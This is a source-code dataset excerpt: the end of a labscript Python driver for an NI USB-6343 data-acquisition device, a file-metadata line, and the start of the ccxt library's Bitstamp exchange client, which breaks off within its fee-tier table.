for i in range(self.num['AO']):
self.ao_data[i] = front_panel_values['ao%d'%i]
self.ao_task.WriteAnalogF64(1,True,1,DAQmx_Val_GroupByChannel,self.ao_data,byref(self.ao_read),None)
for i in range(self.num['DO']):
self.do_data[i] = front_panel_values['port0/line%d'%i]
for i in range(self.num['PFI']):
self.do_data[i+self.num['DO']] = front_panel_values['PFI %d'%i]
self.do_task.WriteDigitalLines(1,True,1,DAQmx_Val_GroupByChannel,self.do_data,byref(self.do_read),None)
# TODO: return coerced/quantised values
return {}
def transition_to_buffered(self,device_name,h5file,initial_values,fresh):
# Store the initial values in case we have to abort and restore them:
self.initial_values = initial_values
with h5py.File(h5file,'r') as hdf5_file:
group = hdf5_file['devices/'][device_name]
device_properties = labscript_utils.properties.get(hdf5_file, device_name, 'device_properties')
connection_table_properties = labscript_utils.properties.get(hdf5_file, device_name, 'connection_table_properties')
clock_terminal = connection_table_properties['clock_terminal']
h5_data = group.get('ANALOG_OUTS')
if h5_data:
self.buffered_using_analog = True
ao_channels = device_properties['analog_out_channels']
# We use all but the last sample (which is identical to the
# second last sample) in order to ensure there is one more
# clock tick than there are samples. The 6733 requires this
# to determine that the task has completed.
ao_data = pylab.array(h5_data,dtype=float64)[:-1,:]
else:
self.buffered_using_analog = False
h5_data = group.get('DIGITAL_OUTS')
if h5_data:
self.buffered_using_digital = True
do_channels = device_properties['digital_lines']
# See comment above for ao_channels
do_bitfield = numpy.array(h5_data,dtype=numpy.uint32)[:-1]
else:
self.buffered_using_digital = False
final_values = {}
# We must do digital first, so as to make sure the manual mode task is stopped, or reprogrammed, by the time we setup the AO task
# this is because the clock_terminal PFI must be freed!
with self.NIDAQ_API_lock:
if self.buffered_using_digital:
# Expand each bitfield int into self.num['DO']
# (32) individual ones and zeros:
do_write_data = numpy.zeros((do_bitfield.shape[0],self.num['DO']),dtype=numpy.uint8)
for i in range(self.num['DO']):
do_write_data[:,i] = (do_bitfield & (1 << i)) >> i
self.do_task.StopTask()
self.do_task.ClearTask()
self.do_task = Task()
self.do_read = int32()
self.do_task.CreateDOChan(do_channels,"",DAQmx_Val_ChanPerLine)
self.do_task.CfgSampClkTiming(clock_terminal,500000,DAQmx_Val_Rising,DAQmx_Val_FiniteSamps,do_bitfield.shape[0])
self.do_task.WriteDigitalLines(do_bitfield.shape[0],False,10.0,DAQmx_Val_GroupByScanNumber,do_write_data,self.do_read,None)
self.do_task.StartTask()
for i in range(self.num['DO']):
final_values['port0/line%d'%i] = do_write_data[-1,i]
else:
# We still have to stop the task to make the
# clock flag available for buffered analog output, or the wait monitor:
self.do_task.StopTask()
self.do_task.ClearTask()
if self.buffered_using_analog:
self.ao_task.StopTask()
self.ao_task.ClearTask()
self.ao_task = Task()
ao_read = int32()
self.ao_task.CreateAOVoltageChan(ao_channels,"",-10.0,10.0,DAQmx_Val_Volts,None)
self.ao_task.CfgSampClkTiming(clock_terminal,500000,DAQmx_Val_Rising,DAQmx_Val_FiniteSamps, ao_data.shape[0])
self.ao_task.WriteAnalogF64(ao_data.shape[0],False,10.0,DAQmx_Val_GroupByScanNumber, ao_data,ao_read,None)
self.ao_task.StartTask()
# Final values here are a dictionary of values, keyed by channel:
channel_list = [channel.split('/')[1] for channel in ao_channels.split(', ')]
for channel, value in zip(channel_list, ao_data[-1,:]):
final_values[channel] = value
else:
# we should probabaly still stop the task (this makes it easier to setup the task later)
self.ao_task.StopTask()
self.ao_task.ClearTask()
return final_values
def transition_to_manual(self,abort=False):
# if aborting, don't call StopTask since this throws an
# error if the task hasn't actually finished!
if self.buffered_using_analog:
if not abort:
self.ao_task.StopTask()
self.ao_task.ClearTask()
if self.buffered_using_digital:
if not abort:
self.do_task.StopTask()
self.do_task.ClearTask()
self.ao_task = Task()
self.do_task = Task()
self.setup_static_channels()
self.ao_task.StartTask()
self.do_task.StartTask()
if abort:
# Reprogram the initial states:
self.program_manual(self.initial_values)
return True
def abort_transition_to_buffered(self):
# TODO: untested
return self.transition_to_manual(True)
def abort_buffered(self):
# TODO: untested
return self.transition_to_manual(True)
class NI_USB_6343AcquisitionWorker(Worker):
def init(self):
        exec 'import traceback' in globals()  # traceback is used in daqmx_read's exception handler
exec 'from PyDAQmx import Task' in globals()
exec 'from PyDAQmx.DAQmxConstants import *' in globals()
exec 'from PyDAQmx.DAQmxTypes import *' in globals()
global h5py; import labscript_utils.h5_lock, h5py
global numpy; import numpy
global threading; import threading
global zprocess; import zprocess
global logging; import logging
global time; import time
self.task_running = False
self.daqlock = threading.Condition()
# Channel details
self.channels = []
self.rate = 1000.
self.samples_per_channel = 1000
self.ai_start_delay = 25e-9
self.h5_file = ""
self.buffered_channels = []
self.buffered_rate = 0
self.buffered = False
self.buffered_data = None
self.buffered_data_list = []
self.task = None
self.abort = False
# And event for knowing when the wait durations are known, so that we may use them
# to chunk up acquisition data:
self.wait_durations_analysed = zprocess.Event('wait_durations_analysed')
self.daqmx_read_thread = threading.Thread(target=self.daqmx_read)
self.daqmx_read_thread.daemon = True
self.daqmx_read_thread.start()
def shutdown(self):
if self.task_running:
self.stop_task()
def daqmx_read(self):
logger = logging.getLogger('BLACS.%s_%s.acquisition.daqmxread'%(self.device_name,self.worker_name))
logger.info('Starting')
#first_read = True
try:
while True:
with self.daqlock:
logger.debug('Got daqlock')
while not self.task_running:
logger.debug('Task isn\'t running. Releasing daqlock and waiting to reacquire it.')
self.daqlock.wait()
#logger.debug('Reading data from analogue inputs')
if self.buffered:
chnl_list = self.buffered_channels
else:
chnl_list = self.channels
try:
error = "Task did not return an error, but it should have"
acquisition_timeout = 5
error = self.task.ReadAnalogF64(self.samples_per_channel,acquisition_timeout,DAQmx_Val_GroupByChannel,self.ai_data,self.samples_per_channel*len(chnl_list),byref(self.ai_read),None)
#logger.debug('Reading complete')
if error is not None and error != 0:
if error < 0:
raise Exception(error)
if error > 0:
logger.warning(error)
except Exception as e:
logger.exception('acquisition error')
if self.abort:
# If an abort is in progress, then we expect an exception here. Don't raise it.
logger.debug('ignoring error since an abort is in progress.')
# Ensure the next iteration of this while loop
# doesn't happen until the task is restarted.
# The thread calling self.stop_task() is
# also setting self.task_running = False
# right about now, but we don't want to rely
# on it doing so in time. Doing it here too
# avoids a race condition.
self.task_running = False
continue
else:
# Error was likely a timeout error...some other device might be bing slow
# transitioning to buffered, so we haven't got our start trigger yet.
# Keep trying until task_running is False:
continue
# send the data to the queue
if self.buffered:
# rearrange ai_data into correct form
data = numpy.copy(self.ai_data)
self.buffered_data_list.append(data)
#if len(chnl_list) > 1:
# data.shape = (len(chnl_list),self.ai_read.value)
# data = data.transpose()
#self.buffered_data = numpy.append(self.buffered_data,data,axis=0)
else:
pass
# Todo: replace this with zmq pub plus a broker somewhere so things can subscribe to channels
# and get their data without caring what process it came from. For the sake of speed, this
# should use the numpy buffer interface and raw zmq messages, and not the existing event system
# that zprocess has.
# self.result_queue.put([self.t0,self.rate,self.ai_read.value,len(self.channels),self.ai_data])
# self.t0 = self.t0 + self.samples_per_channel/self.rate
except:
message = traceback.format_exc()
logger.error('An exception happened:\n %s'%message)
#self.to_parent.put(['error', message])
# TODO: Tell the GUI process that this has a problem some how (status check?)
def setup_task(self):
self.logger.debug('setup_task')
#DAQmx Configure Code
with self.daqlock:
self.logger.debug('setup_task got daqlock')
if self.task:
                self.task.ClearTask()
if self.buffered:
chnl_list = self.buffered_channels
rate = self.buffered_rate
else:
chnl_list = self.channels
rate = self.rate
if len(chnl_list) < 1:
return
if rate < 1000:
self.samples_per_channel = int(rate)
else:
self.samples_per_channel = 1000
try:
self.task = Task()
except Exception as e:
self.logger.error(str(e))
self.ai_read = int32()
self.ai_data = numpy.zeros((self.samples_per_channel*len(chnl_list),), dtype=numpy.float64)
for chnl in chnl_list:
self.task.CreateAIVoltageChan(chnl,"",DAQmx_Val_RSE,-10.0,10.0,DAQmx_Val_Volts,None)
self.task.CfgSampClkTiming("",rate,DAQmx_Val_Rising,DAQmx_Val_ContSamps,1000)
if self.buffered:
#set up start on digital trigger
self.task.CfgDigEdgeStartTrig(self.clock_terminal,DAQmx_Val_Rising)
#DAQmx Start Code
self.task.StartTask()
# TODO: Need to do something about the time for buffered acquisition. Should be related to when it starts (approx)
# How do we detect that?
self.t0 = time.time() - time.timezone
self.task_running = True
self.daqlock.notify()
self.logger.debug('finished setup_task')
def stop_task(self):
self.logger.debug('stop_task')
with self.daqlock:
self.logger.debug('stop_task got daqlock')
if self.task_running:
self.task_running = False
self.task.StopTask()
self.task.ClearTask()
self.daqlock.notify()
self.logger.debug('finished stop_task')
def transition_to_buffered(self,device_name,h5file,initial_values,fresh):
# TODO: Do this line better!
self.device_name = device_name
self.logger.debug('transition_to_buffered')
# stop current task
self.stop_task()
self.buffered_data_list = []
# Save h5file path (for storing data later!)
self.h5_file = h5file
# read channels, acquisition rate, etc from H5 file
h5_chnls = []
with h5py.File(h5file,'r') as hdf5_file:
group = hdf5_file['/devices/'+device_name]
device_properties = labscript_utils.properties.get(hdf5_file, device_name, 'device_properties')
connection_table_properties = labscript_utils.properties.get(hdf5_file, device_name, 'connection_table_properties')
self.clock_terminal = connection_table_properties['clock_terminal']
if 'analog_in_channels' in device_properties:
h5_chnls = device_properties['analog_in_channels'].split(', ')
self.buffered_rate = device_properties['sample_rate_AI']
else:
self.logger.debug("no input channels")
# combine static channels with h5 channels (using a set to avoid duplicates)
self.buffered_channels = set(h5_chnls)
self.buffered_channels.update(self.channels)
# Now make it a sorted list:
self.buffered_channels = sorted(list(self.buffered_channels))
# setup task (rate should be from h5 file)
# Possibly should detect and lower rate if too high, as h5 file doesn't know about other acquisition channels?
if self.buffered_rate <= 0:
self.buffered_rate = self.rate
self.buffered = True
if len(self.buffered_channels) == 1:
self.buffered_data = numpy.zeros((1,),dtype=numpy.float64)
else:
self.buffered_data = numpy.zeros((1,len(self.buffered_channels)),dtype=numpy.float64)
self.setup_task()
return {}
def transition_to_manual(self,abort=False):
self.logger.debug('transition_to_static')
# Stop acquisition (this should really be done on a digital edge, but that is for later! Maybe use a Counter)
# Set the abort flag so that the acquisition thread knows to expect an exception in the case of an abort:
#
# TODO: This is probably bad because it shortly gets overwritten to False
# However whether it has an effect depends on whether daqmx_read thread holds the daqlock
# when self.stop_task() is called
self.abort = abort
self.stop_task()
# Reset the abort flag so that unexpected exceptions are still raised:
self.abort = False
self.logger.info('transitioning to static, task stopped')
# save the data acquired to the h5 file
if not abort:
with h5py.File(self.h5_file,'a') as hdf5_file:
data_group = hdf5_file['data']
data_group.create_group(self.device_name)
dtypes = [(chan.split('/')[-1],numpy.float32) for chan in sorted(self.buffered_channels)]
start_time = time.time()
if self.buffered_data_list:
self.buffered_data = numpy.zeros(len(self.buffered_data_list)*1000,dtype=dtypes)
for i, data in enumerate(self.buffered_data_list):
data.shape = (len(self.buffered_channels),self.ai_read.value)
for j, (chan, dtype) in enumerate(dtypes):
self.buffered_data[chan][i*1000:(i*1000)+1000] = data[j,:]
if i % 100 == 0:
self.logger.debug( str(i/100) + " time: "+str(time.time()-start_time))
self.extract_measurements(self.device_name)
self.logger.info('data written, time taken: %ss' % str(time.time()-start_time))
self.buffered_data = None
self.buffered_data_list = []
# Send data to callback functions as requested (in one big chunk!)
#self.result_queue.put([self.t0,self.rate,self.ai_read,len(self.channels),self.ai_data])
# return to previous acquisition mode
self.buffered = False
self.setup_task()
return True
def extract_measurements(self, device_name):
self.logger.debug('extract_measurements')
with h5py.File(self.h5_file,'a') as hdf5_file:
waits_in_use = len(hdf5_file['waits']) > 0
if waits_in_use:
# There were waits in this shot. We need to wait until the other process has
# determined their durations before we proceed:
self.wait_durations_analysed.wait(self.h5_file)
with h5py.File(self.h5_file,'a') as hdf5_file:
try:
acquisitions = hdf5_file['/devices/'+device_name+'/ACQUISITIONS']
except:
# No acquisitions!
return
try:
measurements = hdf5_file['/data/traces']
except:
# Group doesn't exist yet, create it:
measurements = hdf5_file.create_group('/data/traces')
for connection,label,start_time,end_time,wait_label,scale_factor,units in acquisitions:
start_index = numpy.ceil(self.buffered_rate*(start_time-self.ai_start_delay))
end_index = numpy.floor(self.buffered_rate*(end_time-self.ai_start_delay))
# numpy.ceil does what we want above, but float errors can miss the equality
if self.ai_start_delay + (start_index-1)/self.buffered_rate - start_time > -2e-16:
start_index -= 1
# We actually want numpy.floor(x) to yield the largest integer < x (not <=)
if end_time - self.ai_start_delay - end_index/self.buffered_rate < 2e-16:
end_index -= 1
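# Worked example (hypothetical numbers): with ai_start_delay = 0 and
# buffered_rate = 1000, an acquisition from start_time = 0.005 to end_time = 0.010
# gives start_index = ceil(5) = 5 and end_index = floor(10) = 10; the correction
# above then reduces end_index to 9, so samples 5..9 cover 0.005-0.009 s and the
# sample exactly at 0.010 s belongs to the next interval.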
acquisition_start_time = self.ai_start_delay + start_index/self.buffered_rate
acquisition_end_time = self.ai_start_delay + end_index/self.buffered_rate
times = numpy.linspace(acquisition_start_time, acquisition_end_time,
end_index-start_index+1,
endpoint=True)
values = self.buffered_data[connection][start_index:end_index+1]
dtypes = [('t', numpy.float64),('values', numpy.float32)]
data = numpy.empty(len(values),dtype=dtypes)
data['t'] = times
data['values'] = values
measurements.create_dataset(label, data=data)
def abort_buffered(self):
#TODO: test this
return self.transition_to_manual(True)
def abort_transition_to_buffered(self):
#TODO: test this
return self.transition_to_manual(True)
def program_manual(self,values):
return {}
class NI_USB_6343WaitMonitorWorker(Worker):
def init(self):
exec('import ctypes', globals())
exec('from PyDAQmx import Task', globals())
exec('from PyDAQmx.DAQmxConstants import *', globals())
exec('from PyDAQmx.DAQmxTypes import *', globals())
global h5py; import labscript_utils.h5_lock, h5py
global numpy; import numpy
global threading; import threading
global zprocess; import zprocess
global logging; import logging
global time; import time
self.task_running = False
self.daqlock = threading.Lock() # not sure if needed, access should be serialised already
self.h5_file = None
self.task = None
self.abort = False
self.all_waits_finished = zprocess.Event('all_waits_finished',type='post')
self.wait_durations_analysed = zprocess.Event('wait_durations_analysed',type='post')
def shutdown(self):
self.logger.info('Shutdown requested, stopping task')
if self.task_running:
self.stop_task()
#def read_one_half_period(self, timeout, readarray = numpy.empty(1)):
def read_one_half_period(self, timeout):
readarray = numpy.empty(1)
try:
with self.daqlock:
self.acquisition_task.ReadCounterF64(1, timeout, readarray, len(readarray), ctypes.c_long(1), None)
self.half_periods.append(readarray[0])
return readarray[0]
except Exception:
if self.abort:
raise
# otherwise, it's a timeout:
return None
def wait_for_edge(self, timeout=None):
if timeout is None:
while True:
half_period = self.read_one_half_period(1)
if half_period is not None:
return half_period
else:
return self.read_one_half_period(timeout)
def daqmx_read(self):
logger = logging.getLogger('BLACS.%s_%s.read_thread'%(self.device_name, self.worker_name))
logger.info('Starting')
with self.kill_lock:
try:
# Wait for the end of the first pulse indicating the start of the experiment:
current_time = pulse_width = self.wait_for_edge()
# alright, we're now a short way into the experiment.
for wait in self.wait_table:
# How long until this wait should time out?
timeout = wait['time'] + wait['timeout'] - current_time
timeout = max(timeout, 0) # ensure non-negative
# Wait that long for the next pulse:
half_period = self.wait_for_edge(timeout)
# Did the wait finish of its own accord?
if half_period is not None:
# It did, we are now at the end of that wait:
current_time = wait['time']
# Wait for the end of the pulse:
current_time += self.wait_for_edge()
else:
# It timed out. Better trigger the clock to resume.
self.send_resume_trigger(pulse_width)
# Wait for it to respond to that:
self.wait_for_edge()
# Alright, *now* we're at the end of the wait.
current_time = wait['time']
# And wait for the end of the pulse:
current_time += self.wait_for_edge()
# Inform any interested parties that waits have all finished:
self.all_waits_finished.post(self.h5_file)
except Exception:
if self.abort:
return
else:
raise
def send_resume_trigger(self, pulse_width):
written = int32()
# go high:
self.timeout_task.WriteDigitalLines(1,True,1,DAQmx_Val_GroupByChannel,numpy.ones(1, dtype=numpy.uint8),byref(written),None)
assert written.value == 1
# Wait however long we observed the first pulse of the experiment to be:
time.sleep(pulse_width)
# go low again, ending the resume-trigger pulse:
self.timeout_task.WriteDigitalLines(1,True,1,DAQmx_Val_GroupByChannel,numpy.zeros(1, dtype=numpy.uint8),byref(written),None)
assert written.value == 1
def stop_task(self):
self.logger.debug('stop_task')
with self.daqlock:
self.logger.debug('stop_task got daqlock')
if self.task_running:
self.task_running = False
self.acquisition_task.StopTask()
self.acquisition_task.ClearTask()
self.timeout_task.StopTask()
self.timeout_task.ClearTask()
self.logger.debug('finished stop_task')
def transition_to_buffered(self,device_name,h5file,initial_values,fresh):
self.logger.debug('transition_to_buffered')
# Save h5file path (for storing data later!)
self.h5_file = h5file
self.is_wait_monitor_device = False # Will be set to true in a moment if necessary
self.logger.debug('setup_task')
with h5py.File(h5file, 'r') as hdf5_file:
dataset = hdf5_file['waits']
if len(dataset) == 0:
# There are no waits. Do nothing.
self.logger.debug('There are no waits, not transitioning to buffered')
self.waits_in_use = False
self.wait_table = numpy.zeros((0,))
return {}
self.waits_in_use = True
acquisition_device = dataset.attrs['wait_monitor_acquisition_device']
acquisition_connection = dataset.attrs['wait_monitor_acquisition_connection']
timeout_device = dataset.attrs['wait_monitor_timeout_device']
timeout_connection = dataset.attrs['wait_monitor_timeout_connection']
self.wait_table = dataset[:]
# Only do anything if we are in fact the wait_monitor device:
if timeout_device == device_name or acquisition_device == device_name:
if not (timeout_device == device_name and acquisition_device == device_name):
raise NotImplementedError("NI-USB-6343 worker must be both the wait monitor timeout device and acquisition device. " +
"Being only one could be implemented if there's a need for it, but it isn't at the moment")
self.is_wait_monitor_device = True
# The counter acquisition task:
self.acquisition_task = Task()
acquisition_chan = '/'.join([self.MAX_name,acquisition_connection])
self.acquisition_task.CreateCISemiPeriodChan(acquisition_chan, '', 100e-9, 200, DAQmx_Val_Seconds, "")
self.acquisition_task.CfgImplicitTiming(DAQmx_Val_ContSamps, 1000)
self.acquisition_task.StartTask()
# The timeout task:
self.timeout_task = Task()
timeout_chan = '/'.join([self.MAX_name,timeout_connection])
self.timeout_task.CreateDOChan(timeout_chan,"",DAQmx_Val_ChanForAllLines)
self.task_running = True
# An array to store the results of counter acquisition:
self.half_periods = []
self.read_thread = threading.Thread(target=self.daqmx_read)
# Not a daemon thread, as it implements wait timeouts - we need it to stay alive if other things die.
self.read_thread.start()
self.logger.debug('finished transition to buffered')
return {}
def transition_to_manual(self,abort=False):
self.logger.debug('transition_to_static')
self.abort = abort
self.stop_task()
# Reset the abort flag so that unexpected exceptions are still raised:
self.abort = False
self.logger.info('transitioning to static, task stopped')
# save the data acquired to the h5 file
if not abort:
if self.waits_in_use:
# Let's work out how long the waits were. The absolute times of each edge on the wait
# monitor were:
edge_times = numpy.cumsum(self.half_periods)
# Now there was also a rising edge at t=0 that we didn't measure:
edge_times = numpy.insert(edge_times,0,0)
# Ok, and the even-indexed ones of these were rising edges.
rising_edge_times = edge_times[::2]
# Now what were the times between rising edges?
periods = numpy.diff(rising_edge_times)
# How does this compare to how long we expected there to be between the start
# of the experiment and the first wait, and then between each pair of waits?
# The difference will give us the waits' durations.
resume_times = self.wait_table['time']
# Again, include the start of the experiment, t=0:
resume_times = numpy.insert(resume_times,0,0)
run_periods = numpy.diff(resume_times)
wait_durations = periods - run_periods
waits_timed_out = wait_durations > self.wait_table['timeout']
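# Worked example (hypothetical numbers): half_periods = [0.001, 2.500, 0.001]
# gives edge_times = [0, 0.001, 2.501, 2.502] and rising_edge_times = [0, 2.501],
# so the measured period is 2.501 s. For a single wait scheduled at
# wait_table['time'] = 0.5 the expected run period is 0.5 s, so its duration is
# 2.501 - 0.5 = 2.001 s, and it timed out only if that exceeds its 'timeout'.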
with h5py.File(self.h5_file,'a') as hdf5_file:
# Work out how long the waits were, save em, post an event saying so
dtypes = [('label','a256'),('time',float),('timeout',float),('duration',float),('timed_out',bool)]
data = numpy.empty(len(self.wait_table), dtype=dtypes)
if self.waits_in_use:
data['label'] = self.wait_table['label']
data['time'] = self.wait_table['time']
data['timeout'] = self.wait_table['timeout']
data['duration'] = wait_durations
data['timed_out'] = waits_timed_out
if self.is_wait_monitor_device:
hdf5_file.create_dataset('/data/waits', data=data)
if self.is_wait_monitor_device:
self.wait_durations_analysed.post(self.h5_file)
return True
def abort_buffered(self):
#TODO: test this
return self.transition_to_manual(True)
def abort_transition_to_buffered(self):
#TODO: test this
return self.transition_to_manual(True)
def program_manual(self,values):
return {}
@runviewer_parser
class RunviewerClass(parent.RunviewerClass):
def __init__(self, *args, **kwargs):
kwargs["num_DO"]=32
parent.RunviewerClass.__init__(self, *args, **kwargs)
| 46.572275
| 204
| 0.576996
|
6350c3cbae528bc309377b51d8616ad7fbd150a6
| 66,342
|
py
|
Python
|
python/ccxt/async_support/bitstamp.py
|
pcriadoperez/ccxt
|
fd0db4bad42f4f937c401cdb4cd0bcc4e716282e
|
[
"MIT"
] | null | null | null |
python/ccxt/async_support/bitstamp.py
|
pcriadoperez/ccxt
|
fd0db4bad42f4f937c401cdb4cd0bcc4e716282e
|
[
"MIT"
] | null | null | null |
python/ccxt/async_support/bitstamp.py
|
pcriadoperez/ccxt
|
fd0db4bad42f4f937c401cdb4cd0bcc4e716282e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async_support.base.exchange import Exchange
import math
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import BadRequest
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidAddress
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import NotSupported
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.errors import OnMaintenance
from ccxt.base.errors import InvalidNonce
from ccxt.base.precise import Precise
class bitstamp(Exchange):
def describe(self):
return self.deep_extend(super(bitstamp, self).describe(), {
'id': 'bitstamp',
'name': 'Bitstamp',
'countries': ['GB'],
# 8000 requests per 10 minutes = 8000 / 600 = 13.33333333 requests per second => 1000ms / 13.33333333 = 75ms between requests on average
'rateLimit': 75,
'version': 'v2',
'userAgent': self.userAgents['chrome'],
'pro': True,
'has': {
'CORS': True,
'spot': True,
'margin': False,
'swap': False,
'future': False,
'option': False,
'addMargin': False,
'cancelAllOrders': True,
'cancelOrder': True,
'createOrder': True,
'createReduceOnlyOrder': False,
'fetchBalance': True,
'fetchBorrowRate': False,
'fetchBorrowRateHistories': False,
'fetchBorrowRateHistory': False,
'fetchBorrowRates': False,
'fetchBorrowRatesPerSymbol': False,
'fetchCurrencies': True,
'fetchDepositAddress': True,
'fetchFundingFees': True,
'fetchFundingHistory': False,
'fetchFundingRate': False,
'fetchFundingRateHistory': False,
'fetchFundingRates': False,
'fetchIndexOHLCV': False,
'fetchLedger': True,
'fetchLeverage': False,
'fetchMarkets': True,
'fetchMarkOHLCV': False,
'fetchMyTrades': True,
'fetchOHLCV': True,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrderBook': True,
'fetchPosition': False,
'fetchPositions': False,
'fetchPositionsRisk': False,
'fetchPremiumIndexOHLCV': False,
'fetchTicker': True,
'fetchTrades': True,
'fetchTradingFee': True,
'fetchTradingFees': True,
'fetchTransactions': True,
'fetchWithdrawals': True,
'reduceMargin': False,
'setLeverage': False,
'setMarginMode': False,
'setPositionMode': False,
'withdraw': True,
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/27786377-8c8ab57e-5fe9-11e7-8ea4-2b05b6bcceec.jpg',
'api': {
'public': 'https://www.bitstamp.net/api',
'private': 'https://www.bitstamp.net/api',
},
'www': 'https://www.bitstamp.net',
'doc': 'https://www.bitstamp.net/api',
},
'timeframes': {
'1m': '60',
'3m': '180',
'5m': '300',
'15m': '900',
'30m': '1800',
'1h': '3600',
'2h': '7200',
'4h': '14400',
'6h': '21600',
'12h': '43200',
'1d': '86400',
'1w': '259200',
},
'requiredCredentials': {
'apiKey': True,
'secret': True,
},
'api': {
'public': {
'get': {
'ohlc/{pair}/': 1,
'order_book/{pair}/': 1,
'ticker_hour/{pair}/': 1,
'ticker/{pair}/': 1,
'transactions/{pair}/': 1,
'trading-pairs-info/': 1,
},
},
'private': {
'post': {
'balance/': 1,
'balance/{pair}/': 1,
'bch_withdrawal/': 1,
'bch_address/': 1,
'user_transactions/': 1,
'user_transactions/{pair}/': 1,
'open_orders/all/': 1,
'open_orders/{pair}/': 1,
'order_status/': 1,
'cancel_order/': 1,
'cancel_all_orders/': 1,
'cancel_all_orders/{pair}/': 1,
'buy/{pair}/': 1,
'buy/market/{pair}/': 1,
'buy/instant/{pair}/': 1,
'sell/{pair}/': 1,
'sell/market/{pair}/': 1,
'sell/instant/{pair}/': 1,
'btc_withdrawal/': 1,
'btc_address/': 1,
'ripple_withdrawal/': 1,
'ripple_address/': 1,
'ltc_withdrawal/': 1,
'ltc_address/': 1,
'eth_withdrawal/': 1,
'eth_address/': 1,
'xrp_withdrawal/': 1,
'xrp_address/': 1,
'xlm_withdrawal/': 1,
'xlm_address/': 1,
'pax_withdrawal/': 1,
'pax_address/': 1,
'link_withdrawal/': 1,
'link_address/': 1,
'usdc_withdrawal/': 1,
'usdc_address/': 1,
'omg_withdrawal/': 1,
'omg_address/': 1,
'dai_withdrawal/': 1,
'dai_address/': 1,
'knc_withdrawal/': 1,
'knc_address/': 1,
'mkr_withdrawal/': 1,
'mkr_address/': 1,
'zrx_withdrawal/': 1,
'zrx_address/': 1,
'gusd_withdrawal/': 1,
'gusd_address/': 1,
'aave_withdrawal/': 1,
'aave_address/': 1,
'bat_withdrawal/': 1,
'bat_address/': 1,
'uma_withdrawal/': 1,
'uma_address/': 1,
'snx_withdrawal/': 1,
'snx_address/': 1,
'uni_withdrawal/': 1,
'uni_address/': 1,
'yfi_withdrawal/': 1,
'yfi_address': 1,
'audio_withdrawal/': 1,
'audio_address/': 1,
'crv_withdrawal/': 1,
'crv_address/': 1,
'algo_withdrawal/': 1,
'algo_address/': 1,
'comp_withdrawal/': 1,
'comp_address/': 1,
'grt_withdrawal': 1,
'grt_address/': 1,
'usdt_withdrawal/': 1,
'usdt_address/': 1,
'eurt_withdrawal/': 1,
'eurt_address/': 1,
'matic_withdrawal/': 1,
'matic_address/': 1,
'sushi_withdrawal/': 1,
'sushi_address/': 1,
'chz_withdrawal/': 1,
'chz_address/': 1,
'enj_withdrawal/': 1,
'enj_address/': 1,
'alpha_withdrawal/': 1,
'alpha_address/': 1,
'ftt_withdrawal/': 1,
'ftt_address/': 1,
'storj_withdrawal/': 1,
'storj_address/': 1,
'axs_withdrawal/': 1,
'axs_address/': 1,
'sand_withdrawal/': 1,
'sand_address/': 1,
'hbar_withdrawal/': 1,
'hbar_address/': 1,
'rgt_withdrawal/': 1,
'rgt_address/': 1,
'fet_withdrawal/': 1,
'fet_address/': 1,
'skl_withdrawal/': 1,
'skl_address/': 1,
'cel_withdrawal/': 1,
'cel_address/': 1,
'sxp_withdrawal/': 1,
'sxp_address/': 1,
'ada_withdrawal/': 1,
'ada_address/': 1,
'slp_withdrawal/': 1,
'slp_address/': 1,
'ftm_withdrawal/': 1,
'ftm_address/': 1,
'perp_withdrawal/': 1,
'perp_address/': 1,
'dydx_withdrawal/': 1,
'dydx_address/': 1,
'gala_withdrawal/': 1,
'gala_address/': 1,
'shib_withdrawal/': 1,
'shib_address/': 1,
'amp_withdrawal/': 1,
'amp_address/': 1,
'sgb_withdrawal/': 1,
'sgb_address/': 1,
'avax_withdrawal/': 1,
'avax_address/': 1,
'wbtc_withdrawal/': 1,
'wbtc_address/': 1,
'ctsi_withdrawal/': 1,
'ctsi_address/': 1,
'cvx_withdrawal/': 1,
'cvx_address/': 1,
'imx_withdrawal/': 1,
'imx_address/': 1,
'nexo_withdrawal/': 1,
'nexo_address/': 1,
'ust_withdrawal/': 1,
'ust_address/': 1,
'transfer-to-main/': 1,
'transfer-from-main/': 1,
'withdrawal-requests/': 1,
'withdrawal/open/': 1,
'withdrawal/status/': 1,
'withdrawal/cancel/': 1,
'liquidation_address/new/': 1,
'liquidation_address/info/': 1,
'btc_unconfirmed/': 1,
'websockets_token/': 1,
},
},
},
'fees': {
'trading': {
'tierBased': True,
'percentage': True,
'taker': self.parse_number('0.005'),
'maker': self.parse_number('0.005'),
'tiers': {
'taker': [
[self.parse_number('0'), self.parse_number('0.005')],
[self.parse_number('20000'), self.parse_number('0.0025')],
[self.parse_number('100000'), self.parse_number('0.0024')],
[self.parse_number('200000'), self.parse_number('0.0022')],
[self.parse_number('400000'), self.parse_number('0.0020')],
[self.parse_number('600000'), self.parse_number('0.0015')],
[self.parse_number('1000000'), self.parse_number('0.0014')],
[self.parse_number('2000000'), self.parse_number('0.0013')],
[self.parse_number('4000000'), self.parse_number('0.0012')],
[self.parse_number('20000000'), self.parse_number('0.0011')],
[self.parse_number('50000000'), self.parse_number('0.0010')],
[self.parse_number('100000000'), self.parse_number('0.0007')],
[self.parse_number('500000000'), self.parse_number('0.0005')],
[self.parse_number('2000000000'), self.parse_number('0.0003')],
[self.parse_number('6000000000'), self.parse_number('0.0001')],
[self.parse_number('20000000000'), self.parse_number('0.00005')],
[self.parse_number('20000000001'), self.parse_number('0')],
],
'maker': [
[self.parse_number('0'), self.parse_number('0.005')],
[self.parse_number('20000'), self.parse_number('0.0025')],
[self.parse_number('100000'), self.parse_number('0.0024')],
[self.parse_number('200000'), self.parse_number('0.0022')],
[self.parse_number('400000'), self.parse_number('0.0020')],
[self.parse_number('600000'), self.parse_number('0.0015')],
[self.parse_number('1000000'), self.parse_number('0.0014')],
[self.parse_number('2000000'), self.parse_number('0.0013')],
[self.parse_number('4000000'), self.parse_number('0.0012')],
